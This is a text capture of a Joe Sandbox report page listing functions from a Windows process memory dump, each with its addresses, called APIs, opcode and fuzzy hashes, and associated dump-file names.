                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f83e17b891fdc15e48a33026ed8350b39d5841371481bf5ba7b47583a7fb848
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B719020E0C74785FB64BB64AC742BBA6E0BF20794FD46635D51E426E5DF3CA4918370
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB81D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1497570035-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4217d104700ca5566e1f0308c6e5ff151487f07cac26c90ff5c165b3f15d7429
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC12531A0C78286EA54BB15AC712BBE7A4FF94794F845231EA5E477D5EF3CE4028720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ad5cff42fe5763c4566e59661365a070a5d12fa5a35ac76a9845f4d513b84402
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55A1F021B1839241EE24AB659C242BBE291BF45BE4FC85234EF6E477C4EF3CE4418320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB6BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _pipe.MSVCRT ref: 00007FF706EB6C1E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB6CD1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF706EB6CFB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 624391571-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e7d58b0091aaffdfbf9091795849c59d129ebcf4f331eb840c767679eccd4d8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E719B31A0874286E714BF24DC6107FB6A1FF98754BD89338DA5D472E5DF3CA8128B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4268342597-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 87286e8f8b158cd86c05c5f9243b88df402fce5e81d006bdc3cd1cadec28079d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD816D32A18B8281FB60AF25AC6023AB7A0FF45B84F9C4135CE5D47765DF3CE8818760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC88C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2991381754-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 11a2658b27d227719b0abee5343e4bfd547a0532673aae0f452bf087e5c568b2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F216B32A087928BE740AB94DC602BFEB60FF857B5F944135EB5943694DF78E849CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF706EDC59E), ref: 00007FF706EB5879
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5903
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5943
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5956
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %d.%d.%05d.%d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2996790148-3457777122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 09a191aa5df7de5286bb4b504e8b4ff4c33c51af7bbb96350a94e597b53102d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F0A072A1838187D710AF15BD5406BEAA1FF88780F908138DA4E07B9ACF3CD554CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2831795651-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a61df0691633b4f3c1187f52dc7a891d68bec9f891d428d118653b6b8e850ea3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0D1A372A0878286EB64AF25AC602BBB7A1FF847A4F915135DE4D07798DF3CD542CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB7D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EB7DA1
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC41AD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB7EB7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 168394030-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9f3d8c2b631c1dc8962f1ee7c420e127b79a65dbb28b44c43e2ed2a06d91cb79
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6A10621B0874285FB64AB259D712BBA3A1FF84794FC05135DE5E47AE5EF3CE8068320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC89E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08e70cfab4faa87b90ea4bedd852458ab3d021e5a2fbb06df466186f17344d7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C112A76A18781CBEB509F01ED103AAFBA4FB857A6F808531DF4802694DB7DE589CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
